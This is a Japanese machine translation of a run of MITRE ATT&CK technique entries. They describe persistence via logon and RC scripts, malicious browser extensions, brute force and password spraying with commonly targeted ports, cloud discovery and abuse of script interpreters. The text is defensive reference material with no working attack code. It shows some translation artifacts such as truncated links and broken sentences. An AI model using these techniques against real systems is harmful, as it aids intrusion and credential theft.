敵対者は、これらのスクリプトを使用して、単一のシステム上で永続性を維持することができます。ログオンスクリプトのアクセス構成によっては、ローカルの認証情報または管理者アカウントが必要になります。
65
T1037.003 ブートまたはログオンの初期化スクリプト。ネットワーク ログオン スクリプト 敵対者は、ログオンの初期化時に自動的に実行されるネットワーク ログオン スクリプトを使用して永続性を確立することがあります。ネットワーク ログオン スクリプトは、Active Directory または Group Policy Objects を使用して割り当てることができます(引用:Petri Logon Script AD)。これらのログオン スクリプトは、割り当てられたユーザーの権限で実行されます。ネットワーク内のシステムによっては、これらのスクリプトの1つを初期化することで、複数のシステム、またはすべてのシステムに適用される可能性があります。

敵対者は、これらのスクリプトを使用してネットワーク上の永続性を維持する可能性があります。ログオン スクリプトのアクセス構成によっては、ローカルの認証情報または管理者アカウントが必要になる場合があります。
66
T1037.004 ブートまたはログオンの初期化スクリプト。RCスクリプト 敵対者は、Unix系システムの起動時に実行されるRCスクリプトを変更することで、持続性を確立することができます。これらのファイルにより、システム管理者は、起動時に異なる実行レベルのカスタムサービスをマッピングして開始することができます。

敵対者は、悪意のあるバイナリパスやシェルコマンドを<code>rc.local</code>や<code>rc.common</code>など、Unix系ディストリビューションに固有のRCスクリプトに追加することで、パーシステンスを確立することができます(引用:IranThreats Kittens Dec 2017)(引用:Intezer HiddenWasp Map 2019)再起動時に、システムがルートとしてスクリプトの内容を実行することで、パーシステンスが発生します。

RCスクリプトの敵対者による悪用は、IoTや組み込みシステムなど、rootユーザーをデフォルトで使用する軽量なUnix系ディストリビューションに特に有効です。(引用:インテザー-カイジ-マルウェア)

いくつかのUnix系システムはSystemdに移行し、RCスクリプトの使用を非推奨としています。macOSでも[Launchd](https://attack.mitre.org/techniques/T1053/004)に移行し、非推奨の仕組みとなっています。(引用:Apple Developer Doco Archive Launchd)(引用:Startup Items) この手法は、RCスクリプトを実行するMac OS X Panther v10.3以前のバージョンでも使用することができます。(引用:Methods of Mac Malware Persistence) Ubuntuなどの一部のシステムでは、後方互換性を維持するために、RCスクリプトが正しいファイルパーミッションで存在する場合には、RCスクリプトを実行します。(引用:Ubuntu Manpage systemd rc)
67
T1037.005 ブートまたはログオンの初期化スクリプト。スタートアップアイテム 敵対者は、ブートの初期化時に自動的に実行されるスタートアップアイテムを使って永続性を確立することがあります。スタートアップアイテムは、ブートプロセスの最終段階で実行され、シェルスクリプトなどの実行ファイルと、システムがすべてのスタートアップアイテムの実行順序を決定するために使用する設定情報が含まれています。(引用:Startup Items)

これは技術的には非推奨の技術([Launch Daemon](https://attack.mitre.org/techniques/T1543/004)に取って代わられた)であるため、適切なフォルダである<code>/Library/StartupItems</code>がシステムにデフォルトで存在することは保証されていませんが、macOS Sierraではデフォルトで存在しているようです。スタートアップアイテムとは、実行ファイルと構成プロパティリスト(plist)である<code>StartupParameters.plist</code>がトップレベルのディレクトリに存在するディレクトリのことです。

敵対者は、StartupItemsディレクトリに適切なフォルダ/ファイルを作成して、独自のパーシステンスメカニズムを登録することができます(引用:Methods of Mac Malware Persistence)。さらに、StartupItemsはmacOSの起動段階で実行されるため、昇格したrootユーザーとして実行されます。
68
T1217 ブラウザのブックマーク発見 敵対者は、侵害されたホストの詳細を知るために、ブラウザのブックマークを列挙することがあります。ブラウザのブックマークからは、ユーザの個人情報(銀行サイト、趣味、ソーシャルメディアなど)や、サーバ、ツール/ダッシュボードなどの内部ネットワークリソース、その他の関連インフラに関する詳細情報が得られる可能性があります。

ブラウザのブックマークは、敵対者が有効な認証情報、特にブラウザにキャッシュされたログイン情報に関連する[Credentials In Files](https://attack.mitre.org/techniques/T1552/001)にアクセスした後、追加のターゲットを強調する可能性もあります。

特定の保存場所は、プラットフォームやアプリケーションによって異なりますが、ブラウザのブックマークは通常、ローカルファイル/データベースに保存されます。
69
T1176 ブラウザ拡張機能 侵入者は、インターネットのブラウザ拡張機能を悪用して、被害者のシステムへの持続的なアクセスを確立することがあります。ブラウザの拡張機能やプラグインは、インターネットブラウザの機能を追加したり、カスタマイズしたりできる小さなプログラムです。ブラウザ拡張機能は、直接インストールすることも、ブラウザのアプリストアを通じてインストールすることもでき、通常、ブラウザがアクセスできるすべてのものにアクセスしたり、許可を与えたりすることができます。(引用:Wikipedia Browser Extension)(引用:Chrome Extensions Definition)

悪意のある拡張機能は、正規の拡張機能を装った悪意のあるアプリストアのダウンロード、ソーシャルエンジニアリング、または既にシステムを侵害している敵対者によって、ブラウザにインストールされる可能性があります。ブラウザのアプリストアではセキュリティが制限されていることがあるため、悪意のある拡張機能が自動化されたスキャナーを破ることは難しくないかもしれません。(引用:Malicious Chrome Extension Numbers) ブラウザによっては、敵対者が拡張機能のアップデートURLを操作して、敵対者が管理するサーバーからアップデートをインストールしたり、モバイルの設定ファイルを操作して、追加の拡張機能を静かにインストールしたりすることもあります。

macOS 11以前のバージョンでは、敵対者は<code>profiles</code>ツールを使用してコマンドラインからブラウザの拡張機能をサイレントにインストールし、悪意のある<code>.mobileconfig</code>ファイルをインストールすることができました。macOS 11+では、<code>profiles</code>ツールを使用して設定プロファイルをインストールすることはできなくなりましたが、<code>.mobileconfig</code>ファイルを仕込んで、ユーザーの操作でインストールすることができます。(引用:xorrior chrome extensions macOS)

拡張機能がインストールされると、バックグラウンドでウェブサイトを閲覧したり、(引用:Chrome Extension Crypto Miner)(引用:ICEBRG Chrome Extensions)ユーザーがブラウザに入力したすべての情報(認証情報を含む)を盗んだり(引用:Banker Google Chrome Extension Steals Creds)(引用:Catch All Chrome Extension)、RATのインストーラーとして使用して持続させたりすることが可能になります。

また、悪意のあるChrome拡張機能を使用して永続的なバックドアを使用するボットネットの例もあります。(引用:Stantinko Botnet) また、拡張機能がコマンド&コントロールに使用される同様の例もあります。(引用:Chrome Extension C2 Malware)
70
T1110 ブルートフォース 敵対者は、パスワードが不明な場合やパスワードハッシュを取得した場合に、ブルートフォース技術を使用してアカウントにアクセスすることがあります。アカウントまたはアカウントのセットのパスワードを知らない場合、敵対者は、反復または繰り返しのメカニズムを使用してパスワードを体系的に推測することができます。パスワードのブルートフォースは、クレデンシャルの有効性をチェックするサービスとのやりとりや、パ スワード・ハッシュなどの以前に取得したクレデンシャル・データとのオフラインでのやりとりで行われます。 71
T1110.004 ブルートフォースクレデンシャルスタッフィング 敵対者は、無関係なアカウントの侵害ダンプから入手したクレデンシャルを使用して、クレデンシャルの重複によりターゲットアカウントへのアクセスを得ることがあります。ウェブサイトやサービスが侵害され、ユーザアカウントの認証情報にアクセスすると、大量のユーザ名とパスワードのペアがオンラインにダンプされることがあります。

クレデンシャルの詰め込みは、組織のログイン失敗ポリシーによっては、多数の認証失敗やア カウントロックアウトを引き起こす可能性があるため、リスクの高いオプションです。

一般的に、クレデンシャルのスタッフィングを行う際には、よく使用されるポート上の管理サービスが使用されます。よく狙われるサービスには以下のものがあります。

* SSH (22/TCP)
* Telnet (23/TCP)
* FTP (21/TCP)
* NetBIOS / SMB / Samba (139/TCP & 445/TCP)
* LDAP (389/TCP)
* Kerberos (88/TCP)
* RDP / ターミナルサービス (3389/TCP)
* HTTP/HTTP マネジメントサービス (80/TCP &443/TCP)
* MSSQL (1433/TCP)
* Oracle (1521/TCP)
* MySQL (3306/TCP)
* VNC (5900/TCP)

管理サービスに加えて、敵対者は「シングルサインオン(SSO)や連携認証プロトコルを利用したクラウドベースのアプリケーション、さらにはOffice 365などの外部向けの電子メールアプリケーションを標的にする」可能性があります。(引用:US-CERT TA18-068A 2018)
72
T1110.002 ブルートフォースパスワードクラッキング 敵対者は、パスワード・ハッシュなどのクレデンシャル資料を入手すると、パスワード・クラッキングを使用して、平文のパスワードなどの使用可能なクレデンシャルを回復しようとすることがあります。パスワード・ハッシュを取得するために[OS Credential Dumping](https://attack.mitre.org/techniques/T1003)が使用されますが、[Pass the Hash](https://attack.mitre.org/techniques/T1550/002)がオプションでない場合、これは敵対者をそこまで導くだけかもしれません。ハッシュの計算に使用されたパスワードを系統的に推測する技術がありますが、敵対者は事前に計算されたレインボーテーブルを使用してハッシュをクラックすることができます。ハッシュのクラッキングは、通常、標的となるネットワークの外にある敵対者が管理するシステム上で行われます。(引用:Wikipedia パスワードクラッキング) ハッシュのクラッキングに成功して得られた平文のパスワードは、そのアカウントがアクセス可能なシステム、リソース、サービスへのログインに使用される可能性があります。 73
T1110.001 ブルートフォースパスワードを推測する システムや環境内の正当な認証情報を事前に知らない敵対者は、パスワードを推測してアカウントへのアクセスを試みることがあります。アカウントのパスワードを知らない場合、敵対者は反復的または繰り返しのメカニズムを使用してパスワードを系統的に推測することを選ぶことができる。敵対者は、一般的なパスワードのリストを使用して、操作中にシステムまたは環境のパスワードを事前に知らなくても、ログイン認証情報を推測することができる。パスワード推測は、パスワードの複雑さに関するターゲットのポリシーを考慮したり、何度も失敗した後にアカウントをロックアウトする可能性のあるポリシーを使用したりする場合もあります。

パスワード推測は、組織のログイン失敗ポリシーによっては、何度も認証に失敗したりアカウントをロックアウトしたりする可能性があるため、リスクの高いオプションとなります。(引用:Cylance Cleaver)

一般的に、パスワードを推測する際には、よく使われるポート上の管理サービスが使用されます。よく狙われるサービスは以下の通りです。

* SSH (22/TCP)
* Telnet (23/TCP)
* FTP (21/TCP)
* NetBIOS / SMB / Samba (139/TCP & 445/TCP)
* LDAP (389/TCP)
* Kerberos (88/TCP)
* RDP / ターミナルサービス (3389/TCP)
* HTTP/HTTP マネジメントサービス (80/TCP &443/TCP)
* MSSQL (1433/TCP)
* Oracle (1521/TCP)
* MySQL (3306/TCP)
* VNC (5900/TCP)

管理サービスに加えて、敵対者は「シングルサインオン(SSO)や連携認証プロトコルを利用したクラウドベースのアプリケーション、さらにはOffice 365などの外部向けの電子メールアプリケーションを標的にする」可能性があります。(引用:US-CERT TA18-068A 2018)

デフォルトの環境では、LDAPとKerberosの接続試行は、SMBを介してイベントをトリガする可能性が低く、Windowsの「ログオン失敗」イベントID 4625が作成されます。
74
T1110.003 ブルートフォースパスワードスプレイ 敵対者は、有効なアカウント認証情報の取得を試みるために、多くの異なるアカウントに対して、単一の、またはよく使われるパスワードの小さなリストを使用することがある。パスワードスプレーは、ドメインの複雑性ポリシーに一致する可能性のある1つのパスワード(例:「Password01」)、またはよく使われるパスワードの小さなリストを使用する。ネットワーク上の多くの異なるアカウントに対してそのパスワードでログインを試み、通常、1つのアカウントを多くのパスワードでブルートフォースする際に発生するアカウントロックアウトを回避します。(引用: BlackHillsInfosec Password Spraying)

一般的に、パスワードスプレーの際には、一般的に使用されるポートの管理サービスが使用されます。よく狙われるサービスは以下の通りです。

* SSH (22/TCP)
* Telnet (23/TCP)
* FTP (21/TCP)
* NetBIOS / SMB / Samba (139/TCP & 445/TCP)
* LDAP (389/TCP)
* Kerberos (88/TCP)
* RDP / ターミナルサービス (3389/TCP)
* HTTP/HTTPマネジメントサービス (80/TCP &443/TCP)
* MSSQL (1433/TCP)
* Oracle (1521/TCP)
* MySQL (3306/TCP)
* VNC (5900/TCP)

管理サービスに加えて、敵対者は「シングルサインオン(SSO)や連携認証プロトコルを利用したクラウドベースのアプリケーション、さらにはOffice 365などの外部向けの電子メールアプリケーションを標的にする」可能性があります。(引用:US-CERT TA18-068A 2018)

デフォルトの環境では、LDAPとKerberosの接続試行は、SMBを介してイベントをトリガする可能性が低く、Windowsの「ログオン失敗」イベントID 4625が作成されます。
75
T1612 ホスト上でのビルドイメージ 敵対者は、パブリックレジストリから悪意のあるイメージを取得することを監視する防御策を回避するために、ホスト上で直接コンテナイメージを構築する可能性があります。リモートの<code>build</code>リクエストがDocker APIに送信されることがあります。このリクエストには、公共またはローカルのレジストリからalpineなどのバニラベースのイメージを取得し、その上にカスタムイメージを構築するDockerfileが含まれています。(引用:Docker Build Image)

敵対者は、その<code>build</code> APIを利用して、C2サーバーからダウンロードしたマルウェアを含むカスタムイメージをホスト上に構築し、[Deploy Container](https://attack.引用:Aqua Build Images on Hosts)ベースイメージがパブリックレジストリから取得された場合、防御側はバニライメージであるため、そのイメージを悪意のあるものとして検出しない可能性があります。ベースイメージがすでにローカルレジストリに存在している場合、イメージがすでに環境に存在しているため、引き抜きはさらに疑わしくないとみなされる可能性があります。
76
T1115 クリップボードデータ

Windowsでは、アプリケーションはWindows APIを使用してクリップボードのデータにアクセスできます。(引用:MSDN Clipboard) OSXでは、クリップボードの内容を取得するネイティブコマンド<code>pbpaste</code>が用意されています。(引用:Operating with EmPyre)
77
T1580 クラウドインフラの発見 敵対者は、infrastructure-as-a-service(IaaS)環境で利用可能なリソースを発見しようとする可能性があります。

クラウドプロバイダーは、インフラに関する情報を提供するために、API や CLI で発行されるコマンドなどの方法を提供しています。例えば、AWSでは、アカウント内の1つ以上のインスタンスに関する情報を返すことができるAmazon EC2 API内の<code>DescribeInstances</code> APIや、リクエストの認証された送信者が所有するすべてのバケットのリストを返す<code>ListBuckets</code> APIなどを提供しています。(引用:Amazon Describe Instance)(引用:Amazon Describe Instances API) 同様に、GCPのCloud SDK CLIでは、プロジェクト内のすべてのGoogle Compute Engineインスタンスをリストアップする<code>gcloud compute instances list</code>コマンドが提供されており(引用:Google Compute Instances)、AzureのCLIコマンド<code>az vm list</code>では、仮想マシンの詳細をリストアップしています。(引用:Microsoft AZ CLI)

敵対者は、侵害されたユーザーのアクセスキーを使用してリソースを列挙し、そのユーザーが利用できるリソースを判断することができます。(引用:Expel IO Evil in AWS) これらの利用可能なリソースの発見は、Persistenceの確立など、クラウド環境における敵対者の次のステップを決定するのに役立つかもしれません。(引用:Mandiant M-Trends 2020) [Cloud Service Discovery](https://attack.mitre.org/techniques/T1526)とは異なり、この技術はサービスそのものではなく、提供されるサービスのコンポーネントの発見に焦点を当てています。
78
T1538 クラウドサービスダッシュボード 敵対者は、盗んだ認証情報を使ってクラウドサービスのダッシュボードGUIを使用し、運用中のクラウド環境から特定のサービス、リソース、機能などの有用な情報を得ることができます。例えば、GCP Command Centerを使用すると、すべての資産、潜在的なセキュリティリスクの発見、パブリックIPアドレスやオープンポートの検索などの追加クエリを実行することができます(引用:Google Command Center Dashboard)

環境の構成によっては、敵対者はAPIよりもグラフィカルなダッシュボードを介してより多くの情報を列挙することができる場合があります。これにより、敵対者はAPIリクエストを行わずに情報を得ることができます。
79
T1526 クラウドサービスディスカバリー 敵対者は、アクセス権を得た後、システム上で稼働しているクラウドサービスを列挙しようとすることがあります。その方法は、PaaS(Platform-as-a-Service)、IaaS(Infrastructure-as-a-Service)、SaaS(Software-as-a-Service)などさまざまです。様々なクラウドプロバイダーには多くのサービスが存在し、CI/CD(Continuous Integration and Continuous Delivery)、Lambda Functions、Azure AD などがあります。

敵対者は、環境全体で有効になっているサービスに関する情報を発見しようとするかもしれません。Azure AD Graph APIやAzure Resource Manager APIなどのAzureツールやAPIは、アプリケーション、管理グループ、リソース、ポリシー定義などのリソースやサービス、およびIDでアクセス可能なそれらの関係を列挙することができます。(引用:Azure - Resource Manager API)(引用:Azure AD Graph API)

Stormspotterは、Azureのリソースやサービスを列挙してグラフを構築するためのオープンソースのツールであり、Pacuは、クラウドサービスを発見するためのいくつかの方法をサポートするオープンソースのAWS exploitationフレームワークです。(引用:Azure - Stormspotter)(引用:GitHub Pacu)
80
T1059 コマンドおよびスクリプティングインタプリタ 敵対者は、コマンドインタープリタやスクリプトインタープリタを悪用して、コマンド、スクリプト、バイナリを実行することがあります。これらのインターフェースや言語は、コンピュータシステムとの対話方法を提供するもので、さまざまなプラットフォームに共通する機能です。例えば、macOSやLinuxのディストリビューションには、[Unix Shell](https://attack.mitre.org/techniques/T1059/004)が組み込まれており、Windowsには[Windows Command Shell](https://attack.mitre.org/techniques/T1059/003)や[PowerShell](https://attack.mitre.org/techniques/T1059/001)が組み込まれています。

また、[Python](https://attack.mitre.org/techniques/T1059/006)のようなクロスプラットフォームのインタープリタや、[JavaScript](https://attack.mitre.org/techniques/T1059/007)や[Visual Basic](https://attack.mitre.org/techniques/T1059/005)のようなクライアントアプリケーションによく使われるものもあります。

敵対者は、任意のコマンドを実行する手段として、これらの技術をさまざまな方法で悪用することができます。コマンドやスクリプトは、おびき寄せ文書として被害者に配信される[Initial Access](https://attack.mitre.org/tactics/TA0001)ペイロードや、既存のC2からダウンロードされる二次的なペイロードに埋め込むことができます。また、敵対者は対話型端末/シェルを通じてコマンドを実行することもできます。
81
T1059.002 コマンド&スクリプティングインタプリタ。アップルスクリプト 敵対者がAppleScriptを悪用して実行することがあります。AppleScriptは、AppleEventsと呼ばれるアプリケーション間メッセージを介して、アプリケーションやOSの一部を制御するために設計されたmacOSのスクリプト言語です。(引用:Apple AppleScript)これらのAppleEventメッセージは、独立して送信することも、AppleScriptで簡単にスクリプト化することもできます。

スクリプトは <code>osascript /path/to/script</code> や <code>osascript -e "script here"</code> を通じてコマンドラインから実行することができます。コマンドライン以外にも、Mailのルール、Calendar.appのアラーム、Automatorのワークフローなど、様々な方法でスクリプトを実行できます。AppleScriptsは、スクリプトファイルの先頭に<code>#!/usr/bin/osascript</code>を追加することで、プレーンテキストのシェルスクリプトとして実行することもできます(Citation: SentinelOne AppleScript)

AppleScriptsは、実行するために<code>osascript</code>を呼び出す必要はありません。それらはmacOS [Native API](https://attack.mitre.org/techniques/T1106)の<code>NSAppleScript</code>や<code>OSAScript</code>を使用することで、mach-Oのバイナリの中から実行することができますが、これらはどちらも<code>/usr/bin/osascript</code>コマンド・ライン・ユーティリティから独立したコードを実行します。

敵対者はAppleScriptを悪用して、開いているSSH接続とのやりとりや、リモートマシンへの移動、さらにはユーザーに偽のダイアログボックスを提示するなど、さまざまな動作を実行することができます。これらのイベントでは、アプリケーションをリモートで起動することはできませんが(ローカルで起動することは可能)、アプリケーションがすでにリモートで実行されている場合には、そのアプリケーションと対話することができます。macOS 10.10 Yosemite以降では、AppleScriptには[Native API](https://attack.mitre.org/techniques/T1106)を実行する機能があり、通常であればmach-Oのバイナリファイル形式でコンパイルして実行する必要があります(引用元:SentinelOne macOS Red Team)。スクリプト言語であるため、[Python](https://attack.mitre.org/techniques/T1059/006)によるリバースシェルなど、より一般的な手法を起動することも可能です。(引用:Macを狙うMacro Malware Targets Macs)
82
T1059.007 コマンド&スクリプティングインタープリタ。JavaScript 敵対者は、様々な実装のJavaScriptを悪用して実行する可能性があります。JavaScript(JS)は、プラットフォームに依存しないスクリプト言語(実行時にジャストインタイムでコンパイルされる)であり、一般的にウェブページのスクリプトと関連していますが、JSはブラウザ外の実行環境でも実行可能です(引用:NodeJS)

JScriptは、同じスクリプト規格のマイクロソフトの実装です。JScriptはWindows Scriptエンジンを介して解釈されるため、[Component Object Model](https://attack.mitre.org/techniques/T1559/001)やInternet Explorer HTML Application(HTA)ページなど、Windowsの多くのコンポーネントに統合されています。(引用:JScrip May 2018)(引用:Microsoft JScript 2007)(引用:Microsoft Windows Scripts)

JavaScript for Automation(JXA)は、OSX 10.10で導入されたAppleのOpen Scripting Architecture(OSA)の一部として含まれる、JavaScriptをベースにしたmacOSのスクリプト言語です。OSX 10.10で導入されたAppleのオープン・スクリプティング・アーキテクチャ(OSA)は、アプリケーションの制御、オペレーティングシステムとのインターフェイス、およびAppleの他の内部APIへのアクセスを可能にするスクリプト機能を提供します。OSX 10.10では、OSAはJXAと[AppleScript](https://attack.mitre.org/techniques/T1059/002)の2つの言語のみをサポートしています。スクリプトは、コマンドラインユーティリティーの<code>osascript</code>で実行したり、<code>osacompile</code>でアプリケーションやスクリプトファイルにコンパイルしたり、OSAKitフレームワークを活用して他のプログラムのメモリ内でコンパイルして実行したりすることができる。(引用:Apple About Mac Scripting 2016)(引用:SpecterOps JXA 2020)(引用:SentinelOne macOS Red Team)(引用:Red Canary Silver Sparrow Feb2021)(引用:MDSec macOS JXA and VSCode)

敵対者は、JavaScriptのさまざまな実装を悪用して、さまざまな動作を実行する可能性があります。一般的な使用方法としては、[Drive-by Compromise](https://attack.mitre.org/techniques/T1189)の一環として悪意のあるスクリプトをWebサイト上でホスティングしたり、これらのスクリプトファイルを二次的なペイロードとしてダウンロードして実行したりすることが挙げられます。これらのペイロードはテキストベースであるため、「難読化されたファイルまたは情報」(https://attack.mitre.org/techniques/T1027)の一部として、その内容を難読化することも非常に一般的です。
83
T1059.008 コマンドおよびスクリプティングインタプリタ。ネットワーク機器のCLI 敵対者は、ネットワーク機器上のスクリプトや内蔵のコマンドライン・インタープリタ(CLI)を悪用して、悪意のあるコマンドやペイロードを実行することがあります。CLI は、ユーザーや管理者が、システム情報の表示、デバイスの操作の変更、診断や管理機能の実行のために、デバイスとやり取りするための主要な手段です。CLI には通常、異なるコマンドに必要なさまざまな許可レベルが含まれています。

スクリプトインタープリタは、タスクを自動化し、ネットワーク OS に含まれるコマンドセットよりも機能を拡張します。CLI およびスクリプティング・インタープリタは、直接のコンソール接続、またはテルネットやセキュ ア・シェル(SSH)などのリモート手段を介してアクセスできます。

敵対者はネットワーク CLI を使用して、ネットワーク・デバイスの動作や操作方法を 変更することができます。CLIは、データを傍受または操作するためにトラフィックフローを操作したり、悪意のあるシステムソフトウェアをロードするために起動時の構成パラメータを変更したり、検出を避けるためにセキュリティ機能やログを無効にしたりするために使用することができます。(引用:Cisco Synful Knock Evolution)
84
T1059.001 コマンドおよびスクリプティングインタプリタ。PowerShell 敵対者がPowerShellのコマンドやスクリプトを悪用して実行する可能性があります。PowerShellは、Windowsオペレーティングシステムに搭載されている強力な対話型コマンドラインインターフェイスおよびスクリプト環境です。(引用:TechNet PowerShell) 敵対者はPowerShellを使用して、情報の発見やコードの実行など、さまざまなアクションを実行できます。例えば、実行ファイルの実行に使用できる<code>Start-Process</code>コマンドレットや、ローカルまたはリモートコンピュータ上でコマンドを実行する<code>Invoke-Command</code>コマンドレットなどがあります(ただし、PowerShellを使用してリモートシステムに接続するには、管理者権限が必要です)。

PowerShell は、インターネットから実行ファイルをダウンロードして実行するためにも使用されます。これらの実行ファイルは、ディスクに触れることなく、ディスクまたはメモリ内から実行することができます。

PowerShell ベースの攻撃テストツールは、以下のようなものがあります。 [Empire](https://attack.mitre.org/software/S0363)、[PowerSploit](https://attack.mitre.org/software/S0194)、[PoshC2](https://attack.mitre.org/software/S0378)、PSAttackなどがあります。(引用:Github PSAttack)

PowerShellのコマンド/スクリプトは、<code>powershell.exe</code>バイナリは、.NETフレームワークやWindowsのCLI(Common Language Interface)で公開されているPowerShellの基盤となる<code>System.Management.Automation</code>アセンブリDLLへのインターフェースを通じて実行することができます。(引用元:Sixdub PowerPick 2016年1月)(引用元:SilentBreak Offensive PS 2015年12月)(引用元:Microsoft PSfromCsharp APR 2014)
85
T1059.006 コマンド&スクリプティングインタプリタ。パイソン 敵対者がPythonのコマンドやスクリプトを悪用して実行する可能性があります。Pythonは非常に人気のあるスクリプト/プログラミング言語で、多くの機能を実行することができます。Pythonは、コマンドラインから(<code>python.exe</code>インタプリタを介して)対話的に実行することも、スクリプト(.py)を書いて異なるシステムに配布することもできます。

Pythonには、ファイル操作やデバイスI/Oなど、基盤となるシステムと対話するための多くの組み込みパッケージが用意されています。侵入者は、これらのライブラリを利用して、コマンドや他のスクリプトをダウンロードして実行したり、様々な悪意のある動作を行ったりすることができます。
86
T1059.004 コマンドおよびスクリプティングインタプリタ。Unixシェル 敵対者は、Unixシェルのコマンドやスクリプトを悪用して実行することがあります。引用:DieNet Bash)(引用:Apple ZShell) Unixシェルは、システムのあらゆる側面を制御できますが、特定のコマンドには昇格特権が必要です。

Unixシェルは、コマンドの逐次実行や、条件分岐やループなどの典型的なプログラミング操作を可能にするスクリプトもサポートしています。シェルスクリプトの一般的な用途としては、長時間の作業や繰り返しの作業、複数のシステムで同じコマンドを実行する必要がある場合などが挙げられます。

敵対者は、Unix シェルを悪用してさまざまなコマンドやペイロードを実行することがあります。インタラクティブなシェルは、コマンド&コントロール・チャネルを通じて、または[SSH](https://attack.mitre.org/techniques/T1021/004)のような横移動の際にアクセスされることがあります。また、シェルスクリプトを利用して、被害者に複数のコマンドを配信・実行したり、持続的に使用するペイロードの一部として利用したりすることもあります。
87
T1059.005 コマンドおよびスクリプティングインタプリタ。ビジュアル・ベーシック 敵対者は、実行にVisual Basic(VB)を悪用することがあります。VBは、マイクロソフト社が開発したプログラミング言語で、Windows APIを介して、[Component Object Model](https://attack.mitre.org/techniques/T1559/001)や[Native API](https://attack.mitre.org/techniques/T1106)などの多くのWindowsテクノロジーとの相互運用性を備えています。将来の進化が予定されていないレガシーとしてタグ付けされていますが、VBは.NET Frameworkとクロスプラットフォームの.NET Coreに統合されサポートされています。(引用:VB .NET 2020年3月)(引用:VB Microsoft)

また、VBをベースにした派生言語として、Visual Basic for Applications(VBA)やVBScriptなどが作られています。VBAは、Microsoft Officeやいくつかのサードパーティ製アプリケーションに組み込まれているイベント駆動型のプログラミング言語である(引用:Microsoft VBA)(引用:Wikipedia VBA)VBAは、ホスト上のタスクやその他の機能の実行を自動化するために使用されるマクロを文書に含めることができる。VBScriptは、Windowsホスト上のデフォルトのスクリプト言語であり、Internet Explorerに提供されるHTMLアプリケーション(HTA)のウェブページで[JavaScript](https://attack.mitre.org/techniques/T1059/007)の代わりに使用することもできます(ただし、ほとんどの最新ブラウザはVBScriptをサポートしていません)。(引用: Microsoft VBScript)

敵対者は、悪意のあるコマンドを実行するためにVBペイロードを使用することがあります。一般的な悪意のある使い方としては、VBScriptによる動作の自動実行や、VBAコンテンツを[Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001)のペイロードに埋め込むことが挙げられます。
88
T1059.003 コマンドおよびスクリプティングインタプリタ。Windowsコマンドシェル 敵対者は、Windowsのコマンドシェルを悪用して実行することがあります。Windows コマンドシェル ([cmd](https://attack.mitre.org/software/S0106)) は、Windows システムの主要なコマンドプロンプトです。

バッチファイル(.batまたは.cmd)は、条件分岐やループなどの通常のスクリプト操作と同様に、シェルに実行すべき連続したコマンドのリストを提供します。

敵対者は、[cmd](https://attack.mitre.org/software/S0106)を利用して、さまざまなコマンドやペイロードを実行することがあります。一般的な使用方法としては、[cmd](https://attack.mitre.org/software/S0106)を使って単一のコマンドを実行したり、[cmd](https://attack.mitre.org/software/S0106)をコマンド&コントロール・チャネル上で転送される入力と出力を使って対話的に使用したりします。
89
T1092 リムーバブルメディアによるコミュニケーション 敵対者は、システムからシステムへコマンドを転送するためにリムーバブルメディアを使用して、潜在的に切断されたネットワーク上の侵害されたホスト間でコマンド&コントロールを行うことができます。この場合、インターネットに接続されたシステムが最初に侵害され、次にリムーバブルメディアを使った横移動によって、両方のシステムが侵害される必要があります(https://attack.mitre.org/techniques/T1091)。コマンドやファイルは、切断されたシステムから、敵対者が直接アクセスできるインターネットに接続されたシステムに中継されます。 90
T1586 コンプロマイズ・アカウント 敵対者は、ターゲティング時に使用できるサービスのアカウントを侵害する可能性があります。ソーシャルエンジニアリングを取り入れた作戦では、オンライン上のペルソナを利用することが重要になります。敵対者は、アカウントを作成して育てる(例:[Establish Accounts](https://attack.mitre.org/techniques/T1585))のではなく、既存のアカウントを侵害することがあります。既存のペルソナを利用することで、潜在的な被害者が、侵害されたペルソナとの関係や知識を持っていれば、信頼度が高まる可能性があります。

アカウントを侵害するには、[Phishing for Information](https://attack.mitre.org/techniques/T1598)で認証情報を収集するなど、さまざまな方法があります。org/techniques/T1598)、サードパーティのサイトから認証情報を購入する、認証情報をブルートフォースする(例:侵害された認証情報のダンプからパスワードを再利用する)など、アカウントを侵害するにはさまざまな方法があります(引用:AnonHBGary)。アカウントを侵害する前に、敵対者は作戦を進めるためにどのアカウントを侵害するかの判断を下すために、偵察を行うことがあります。

ペルソナは、単一のサイトに存在する場合もあれば、複数のサイトに存在する場合もあります(例:Facebook、LinkedIn、Twitter、Googleなど)。侵害されたアカウントには、プロフィール情報の入力や修正、ソーシャルネットワークの拡張、写真の取り込みなど、追加の開発が必要になる場合があります。

敵対者は、侵害された電子メールアカウントを直接利用して、[情報を得るためのフィッシング](https://attack.mitre.org/techniques/T1598)や[フィッシング](https://attack.mitre.org/techniques/T1566)を行う場合があります。
91
T1586.002 アカウントのコンプロマイズメールアカウント 敵対者は、ターゲティングの際に使用可能な電子メールアカウントを侵害する可能性があります。敵対者は、侵害された電子メールアカウントを利用して、[Phishing for Information](https://attack.mitre.org/techniques/T1598)や[Phishing](https://attack.mitre.org/techniques/T1566)を行うなど、自らの活動を促進することができます。侵害されたメールアカウントを持つ既存のペルソナを利用することで、潜在的な被害者が侵害されたペルソナとの関係や知識を持っている場合には、そのペルソナを信頼することができます。

メールアカウントを侵害するには、「Phishing for Information」(https://attack.mitre.org/techniques/T1598)で認証情報を収集したり、第三者のサイトから認証情報を購入したり、ブルートフォースで認証情報を取得するなど、さまざまな方法があります(例:侵害された認証情報のダンプからパスワードを再利用するなど)。(

敵対者は、侵害した電子メールアカウントを使用して、関心のあるターゲットとの既存の電子メールスレッドをハイジャックすることができます。
92
T1586.001 コンプロマイズ・アカウントソーシャルメディアアカウント 敵対者は、ターゲティングの際に使用できるソーシャルメディアのアカウントを侵害する可能性があります。ソーシャルエンジニアリングを取り入れた作戦では、オンライン上のペルソナを利用することが重要になる場合があります。ソーシャルメディアのプロファイル([Social Media Accounts](https://attack.mitre.org/techniques/T1585/001)など)を作成して育てるのではなく、敵は既存のソーシャルメディアのアカウントを侵害することがあります。既存のペルソナを利用することで、潜在的な被害者が、侵害されたペルソナとの関係や知識を持っていれば、信頼度が高まる可能性があります。

